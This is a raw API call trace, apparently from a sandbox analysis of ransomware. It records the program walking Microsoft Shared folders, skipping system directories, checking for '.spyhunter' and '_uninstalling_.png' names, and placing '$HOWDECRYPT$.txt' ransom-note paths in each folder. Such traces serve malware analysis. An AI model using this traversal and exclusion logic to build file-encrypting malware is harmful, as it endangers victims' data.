lstrcmpiW (lpString1="Wks9Pxy.cnv", lpString2="System Volume Information") returned 1 [0089.813] lstrlenW (lpString="System Volume Information") returned 25 [0089.813] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv") returned 71 [0089.813] StrStrIW (lpFirst="Wks9Pxy.cnv", lpSrch=".spyhunter") returned 0x0 [0089.813] lstrcmpW (lpString1="Wks9Pxy.cnv", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.813] lstrcmpW (lpString1="Wks9Pxy.cnv", lpString2="_uninstalling_.png") returned 1 [0089.813] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv") returned 71 [0089.813] GetProcessHeap () returned 0x2c0000 [0089.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37df78 [0089.813] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xee0) returned 0x3824f8 [0089.813] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.813] lstrcmpiW (lpString1="WPFT532.CNV", lpString2="Windows") returned 1 [0089.813] lstrlenW (lpString="Windows") returned 7 [0089.813] lstrcmpiW (lpString1="WPFT532.CNV", lpString2="$Recycle.bin") returned 1 [0089.813] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.813] lstrcmpiW (lpString1="WPFT532.CNV", lpString2="System Volume Information") returned 1 [0089.813] lstrlenW (lpString="System Volume Information") returned 25 [0089.813] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV") returned 71 [0089.813] StrStrIW (lpFirst="WPFT532.CNV", lpSrch=".spyhunter") returned 0x0 [0089.813] lstrcmpW (lpString1="WPFT532.CNV", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.813] lstrcmpW (lpString1="WPFT532.CNV", lpString2="_uninstalling_.png") returned 1 [0089.813] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV") returned 71 [0089.813] GetProcessHeap () returned 0x2c0000 [0089.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e050 [0089.814] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xee8) returned 0x3824f8 [0089.814] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.814] lstrcmpiW (lpString1="WPFT632.CNV", lpString2="Windows") returned 1 [0089.814] lstrlenW (lpString="Windows") returned 7 [0089.814] lstrcmpiW (lpString1="WPFT632.CNV", lpString2="$Recycle.bin") returned 1 [0089.814] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.814] lstrcmpiW (lpString1="WPFT632.CNV", lpString2="System Volume Information") returned 1 [0089.814] lstrlenW (lpString="System Volume Information") returned 25 [0089.814] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV") returned 71 [0089.814] StrStrIW (lpFirst="WPFT632.CNV", lpSrch=".spyhunter") returned 0x0 [0089.814] lstrcmpW (lpString1="WPFT632.CNV", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.814] lstrcmpW (lpString1="WPFT632.CNV", lpString2="_uninstalling_.png") returned 1 [0089.814] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV") returned 71 [0089.814] GetProcessHeap () returned 0x2c0000 [0089.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e128 [0089.814] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xef0) returned 0x3824f8 [0089.814] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0089.814] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0089.814] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\$HOWDECRYPT$.txt") returned 76 [0089.814] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\$HOWDECRYPT$.txt") returned 76 [0089.814] GetProcessHeap () returned 0x2c0000 [0089.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x373e78 [0089.815] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xef8) returned 0x3824f8 [0089.815] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0089.816] lstrcmpiW (lpString1="THEMES14", lpString2="Windows") returned -1 [0089.816] lstrlenW (lpString="Windows") returned 7 [0089.816] lstrcmpiW (lpString1="THEMES14", lpString2="$Recycle.bin") returned 1 [0089.816] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.816] lstrcmpiW (lpString1="THEMES14", lpString2="System Volume Information") returned 1 [0089.816] lstrlenW (lpString="System Volume Information") returned 25 [0089.816] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14") returned 59 [0089.816] lstrcmpW (lpString1="THEMES14", lpString2=".") returned 1 [0089.816] lstrcmpW (lpString1="THEMES14", lpString2="..") returned 1 [0089.816] GetProcessHeap () returned 0x2c0000 [0089.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0089.816] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*") returned 61 [0089.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0089.924] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.924] lstrlenW (lpString="Windows") returned 7 [0089.924] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.924] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.924] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.924] lstrlenW (lpString="System Volume Information") returned 25 [0089.924] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\.") returned 61 [0089.924] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.924] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.932] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.932] lstrlenW (lpString="Windows") returned 7 [0089.932] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.932] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.932] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.932] lstrlenW (lpString="System Volume Information") returned 25 [0089.932] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\..") returned 62 [0089.932] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.932] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.932] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.932] lstrcmpiW (lpString1="AFTRNOON", lpString2="Windows") returned -1 [0089.932] lstrlenW (lpString="Windows") returned 7 [0089.932] lstrcmpiW (lpString1="AFTRNOON", lpString2="$Recycle.bin") returned 1 [0089.933] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.933] lstrcmpiW (lpString1="AFTRNOON", lpString2="System Volume Information") returned -1 [0089.933] lstrlenW (lpString="System Volume Information") returned 25 [0089.933] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON") returned 68 [0089.933] lstrcmpW (lpString1="AFTRNOON", lpString2=".") returned 1 [0089.933] lstrcmpW (lpString1="AFTRNOON", lpString2="..") returned 1 [0089.933] GetProcessHeap () returned 0x2c0000 [0089.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0089.933] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*") returned 70 [0089.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0089.933] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.933] lstrlenW (lpString="Windows") returned 7 [0089.933] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.933] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.933] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.933] lstrlenW (lpString="System Volume Information") returned 25 [0089.933] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\.") returned 70 [0089.933] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.933] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.933] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.933] lstrlenW (lpString="Windows") returned 7 [0089.934] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.934] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.934] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.934] lstrlenW (lpString="System Volume Information") returned 25 [0089.934] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\..") returned 71 [0089.934] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.934] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.934] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.934] lstrcmpiW (lpString1="AFTRNOON.ELM", lpString2="Windows") returned -1 [0089.934] lstrlenW (lpString="Windows") returned 7 [0089.934] lstrcmpiW (lpString1="AFTRNOON.ELM", lpString2="$Recycle.bin") returned 1 [0089.934] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.934] lstrcmpiW (lpString1="AFTRNOON.ELM", lpString2="System Volume Information") returned -1 [0089.934] lstrlenW (lpString="System Volume Information") returned 25 [0089.934] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM") returned 81 [0089.934] StrStrIW (lpFirst="AFTRNOON.ELM", lpSrch=".spyhunter") returned 0x0 [0089.934] lstrcmpW (lpString1="AFTRNOON.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.934] lstrcmpW (lpString1="AFTRNOON.ELM", lpString2="_uninstalling_.png") returned 1 [0089.934] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM") returned 81 [0089.934] GetProcessHeap () returned 0x2c0000 [0089.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x343938 [0089.934] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xed8) returned 0x3824f8 [0089.934] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.934] lstrcmpiW (lpString1="AFTRNOON.INF", lpString2="Windows") returned -1 [0089.934] lstrlenW (lpString="Windows") returned 7 [0089.934] lstrcmpiW (lpString1="AFTRNOON.INF", lpString2="$Recycle.bin") returned 1 [0089.935] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.935] lstrcmpiW (lpString1="AFTRNOON.INF", lpString2="System Volume Information") returned -1 [0089.935] lstrlenW (lpString="System Volume Information") returned 25 [0089.935] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF") returned 81 [0089.935] StrStrIW (lpFirst="AFTRNOON.INF", lpSrch=".spyhunter") returned 0x0 [0089.935] lstrcmpW (lpString1="AFTRNOON.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.935] lstrcmpW (lpString1="AFTRNOON.INF", lpString2="_uninstalling_.png") returned 1 [0089.935] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF") returned 81 [0089.935] GetProcessHeap () returned 0x2c0000 [0089.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x343a28 [0089.935] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xee0) returned 0x3824f8 [0089.935] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.935] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0089.935] lstrlenW (lpString="Windows") returned 7 [0089.935] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0089.935] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.935] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0089.935] lstrlenW (lpString="System Volume Information") returned 25 [0089.935] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 80 [0089.935] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0089.935] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.935] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0089.935] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 80 [0089.935] GetProcessHeap () returned 0x2c0000 [0089.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x343b18 [0089.935] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xee8) returned 0x3824f8 [0089.936] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.936] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0089.936] lstrlenW (lpString="Windows") returned 7 [0089.936] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0089.936] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.936] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0089.936] lstrlenW (lpString="System Volume Information") returned 25 [0089.936] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 81 [0089.936] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0089.936] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.936] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0089.936] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 81 [0089.936] GetProcessHeap () returned 0x2c0000 [0089.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x343c08 [0089.936] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xef0) returned 0x3824f8 [0089.936] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0089.936] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0089.936] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\$HOWDECRYPT$.txt") returned 85 [0089.936] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\$HOWDECRYPT$.txt") returned 85 [0089.936] GetProcessHeap () returned 0x2c0000 [0089.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x354810 [0089.936] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xef8) returned 0x3824f8 [0089.937] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.937] lstrcmpiW (lpString1="ARCTIC", lpString2="Windows") returned -1 [0089.937] lstrlenW (lpString="Windows") returned 7 [0089.937] lstrcmpiW (lpString1="ARCTIC", lpString2="$Recycle.bin") returned 1 [0089.937] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.937] lstrcmpiW (lpString1="ARCTIC", lpString2="System Volume Information") returned -1 [0089.937] lstrlenW (lpString="System Volume Information") returned 25 [0089.937] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC") returned 66 [0089.937] lstrcmpW (lpString1="ARCTIC", lpString2=".") returned 1 [0089.937] lstrcmpW (lpString1="ARCTIC", lpString2="..") returned 1 [0089.937] GetProcessHeap () returned 0x2c0000 [0089.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0089.937] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*") returned 68 [0089.937] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0089.977] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.977] lstrlenW (lpString="Windows") returned 7 [0089.978] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.978] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.978] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.978] lstrlenW (lpString="System Volume Information") returned 25 [0089.978] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\.") returned 68 [0089.978] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.978] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.978] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.978] lstrlenW (lpString="Windows") returned 7 [0089.978] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.978] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.978] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.978] lstrlenW (lpString="System Volume Information") returned 25 [0089.978] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\..") returned 69 [0089.978] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.978] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.978] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.978] lstrcmpiW (lpString1="ARCTIC.ELM", lpString2="Windows") returned -1 [0089.978] lstrlenW (lpString="Windows") returned 7 [0089.978] lstrcmpiW (lpString1="ARCTIC.ELM", lpString2="$Recycle.bin") returned 1 [0089.978] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.979] lstrcmpiW (lpString1="ARCTIC.ELM", lpString2="System Volume Information") returned -1 [0089.979] lstrlenW (lpString="System Volume Information") returned 25 [0089.979] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM") returned 77 [0089.979] StrStrIW (lpFirst="ARCTIC.ELM", lpSrch=".spyhunter") returned 0x0 [0089.979] lstrcmpW (lpString1="ARCTIC.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.979] lstrcmpW (lpString1="ARCTIC.ELM", lpString2="_uninstalling_.png") returned 1 [0089.979] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM") returned 77 [0089.979] GetProcessHeap () returned 0x2c0000 [0089.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x373e78 [0089.979] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf00) returned 0x3824f8 [0089.979] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.979] lstrcmpiW (lpString1="ARCTIC.INF", lpString2="Windows") returned -1 [0089.979] lstrlenW (lpString="Windows") returned 7 [0089.979] lstrcmpiW (lpString1="ARCTIC.INF", lpString2="$Recycle.bin") returned 1 [0089.979] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.979] lstrcmpiW (lpString1="ARCTIC.INF", lpString2="System Volume Information") returned -1 [0089.979] lstrlenW (lpString="System Volume Information") returned 25 [0089.979] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF") returned 77 [0089.979] StrStrIW (lpFirst="ARCTIC.INF", lpSrch=".spyhunter") returned 0x0 [0089.979] lstrcmpW (lpString1="ARCTIC.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.979] lstrcmpW (lpString1="ARCTIC.INF", lpString2="_uninstalling_.png") returned 1 [0089.979] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF") returned 77 [0089.979] GetProcessHeap () returned 0x2c0000 [0089.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3739f0 [0089.979] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf08) returned 0x3824f8 [0089.979] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.980] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0089.980] lstrlenW (lpString="Windows") returned 7 [0089.980] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0089.980] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.980] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0089.980] lstrlenW (lpString="System Volume Information") returned 25 [0089.980] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 78 [0089.980] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0089.980] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.980] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0089.980] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 78 [0089.980] GetProcessHeap () returned 0x2c0000 [0089.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x373f60 [0089.980] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf10) returned 0x3824f8 [0089.980] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0089.980] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0089.980] lstrlenW (lpString="Windows") returned 7 [0089.980] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0089.980] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.980] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0089.980] lstrlenW (lpString="System Volume Information") returned 25 [0089.980] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 79 [0089.980] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0089.980] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.980] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0089.981] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 79 [0089.981] GetProcessHeap () returned 0x2c0000 [0089.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x374048 [0089.981] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf18) returned 0x3824f8 [0089.981] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0089.981] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0089.981] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\$HOWDECRYPT$.txt") returned 83 [0089.981] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\$HOWDECRYPT$.txt") returned 83 [0089.981] GetProcessHeap () returned 0x2c0000 [0089.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x343cf8 [0089.981] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xf20) returned 0x3824f8 [0089.981] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.981] lstrcmpiW (lpString1="AXIS", lpString2="Windows") returned -1 [0089.981] lstrlenW (lpString="Windows") returned 7 [0089.981] lstrcmpiW (lpString1="AXIS", lpString2="$Recycle.bin") returned 1 [0089.981] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.981] lstrcmpiW (lpString1="AXIS", lpString2="System Volume Information") returned -1 [0089.981] lstrlenW (lpString="System Volume Information") returned 25 [0089.981] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS") returned 64 [0089.981] 